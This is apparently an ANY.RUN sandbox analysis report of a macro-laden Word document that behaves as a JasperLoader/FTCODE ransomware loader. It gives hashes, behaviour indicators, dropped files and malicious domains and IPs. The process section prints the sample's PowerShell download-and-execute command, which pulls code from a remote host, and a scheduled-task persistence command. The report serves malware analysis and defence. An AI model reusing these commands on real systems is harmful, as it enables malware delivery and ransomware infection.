analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Nuovo_documento_34.doc

Full analysis: https://app.any.run/tasks/b8d9fd47-a3c3-4792-a498-827696c176ff
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 14, 2019, 10:48:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
loader
jasper
ransomware
ftcode
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Create Time/Date: Fri Oct 11 18:18:00 2019, Last Saved Time/Date: Mon Oct 14 03:40:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

F6B0E205590664A51AC4D852F1DFDE63

SHA1:

828B2AE3D3E6395E8B64241D4B84B571D08FE73F

SHA256:

DA4F89EC1B4E7A9E121DDBFD92363875C4C1274CB110A0DF64E3C06FFAAA92F7

SSDEEP:

3072:NvaU+HscWycwdtQNclQdIkIqWDEcAbCGB74/DIk5SEq:Ja1shhwoNclQbIqWDEcAmS4rIK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2748)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2748)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 1748)
    • JASPER was detected

      • powershell.exe (PID: 1748)
    • Renames files like Ransomware

      • powershell.exe (PID: 1748)
    • FTCODE was detected

      • powershell.exe (PID: 1748)
    • Writes to a start menu file

      • powershell.exe (PID: 1748)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3640)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1748)
    • Creates files like Ransomware instruction

      • powershell.exe (PID: 1748)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2748)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2748)
    • Dropped object may contain URL to Tor Browser

      • powershell.exe (PID: 1748)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 1748)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Administrator
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: Administrator
RevisionNumber: 9
Software: Microsoft Office Word
TotalEditTime: 12.0 minutes
CreateDate: 2019:10:11 17:18:00
ModifyDate: 2019:10:14 02:40:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs #JASPER powershell.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2748"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Nuovo_documento_34.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1748"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3640"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 11 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 954
Read events
1 219
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
42
Text files
15
Unknown types
3

Dropped files

PID
Process
Filename
Type
2748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB792.tmp.cvr
MD5:
SHA256:
1748powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWFDWR6A4DUHQHRLPFW.temp
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\developprogress.rtf
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\functionalsays.rtf
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\lovewomen.rtf
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\morningskills.jpg
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\overviewnotes.rtf
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\standpicture.jpg
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\tripwar.png
MD5:
SHA256:
1748powershell.exeC:\Users\admin\Desktop\youminutes.jpg
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1748
powershell.exe
GET
200
185.189.151.22:80
http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997
CH
text
9.35 Kb
malicious
1748
powershell.exe
GET
200
185.189.151.22:80
http://abby.abbyehughes.com/?need=aegzfej&vid=dpec10&
CH
text
78.6 Kb
malicious
1748
powershell.exe
POST
200
185.158.249.55:80
http://connect.contractorquote.info/
NL
text
2 b
malicious
1748
powershell.exe
POST
200
185.158.249.55:80
http://connect.contractorquote.info/
NL
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1748
powershell.exe
185.189.151.22:80
jes.dhinsuranceservices.com
SOFTplus Entwicklungen GmbH
CH
malicious
1748
powershell.exe
185.158.249.55:80
connect.contractorquote.info
easystores GmbH
NL
malicious
185.189.151.22:80
jes.dhinsuranceservices.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
jes.dhinsuranceservices.com
  • 185.189.151.22
malicious
abby.abbyehughes.com
  • 185.189.151.22
malicious
connect.contractorquote.info
  • 185.158.249.55
malicious

Threats

PID
Process
Class
Message
1748
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] JasperLoader Obfuscation
1748
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Ransom.PowerShell.Ftcode.A!MSR
2 ETPRO signatures available at the full report
No debug info